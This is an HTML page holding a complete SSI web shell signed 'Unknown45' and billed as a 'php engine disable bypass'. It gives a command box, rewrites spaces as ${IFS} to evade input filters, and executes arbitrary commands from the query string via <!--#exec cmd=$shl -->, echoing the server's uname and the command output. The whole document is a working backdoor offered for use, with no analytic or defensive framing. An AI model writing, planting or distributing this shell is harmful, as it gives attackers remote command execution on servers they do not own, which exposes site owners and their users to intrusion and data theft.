<!-- Author : Unknown45 --> <!-- hargai author dengan cara menggunakan script ini tanpa mengrecode script ini !!! --> <!--#config errmsg="[Error in shell]"--> <!--#set var="zero" value="" --> <!--#if expr="$QUERY_STRING_UNESCAPED = \$zero" --> <!--#set var="shl" value="whoami" --> <!--#else --> <!--#set var="shl" value=$QUERY_STRING_UNESCAPED --> <!--#endif --> <title>SSI Command Bypass</title> <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script> <script language="javascript"> function fex() { var uri = document.getElementById('command').value; var rep = uri.replace(/[ ]/g,'${IFS}'); var res = encodeURI(uri); document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+encodeURI(rep); } </script> <script> document.onkeydown = keydown; function keydown(e) { if (!e) e = event; if (e.keyCode === 13) { var uri = document.getElementById('command').value; var rep = uri.replace(/[ ]/g,'${IFS}'); var res = encodeURI(uri); document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+encodeURI(rep); } } </script> <font face=courier size=2><i>php engine disable bypass by unknown45 | server : <font color=green><!--#exec cmd="{uname,-nr}" --></font>
<font size=2>Command : <input type=text size=60 id=command class="text" name="address1" style="max-width: 100%; max-height: 100%;">&nbsp;<input type=button value=Execute onclick="fex();"> <hr> Executed Command : </font><!--#echo var=shl -->
<textarea bgcolor=#e4e0d8 cols=121 rows=15> <!--#exec cmd=$shl --> </textarea> <script> //$('body').on('input', 'input[name=address1]', function() { // $(this).val($(this).val().replace(' ', '${IFS}')); //}); </script> <hr> <font face="courier" size=2>Unknown45
<a href="https://exploits.my.id" target="_blank">https://exploits.my.id</a></font>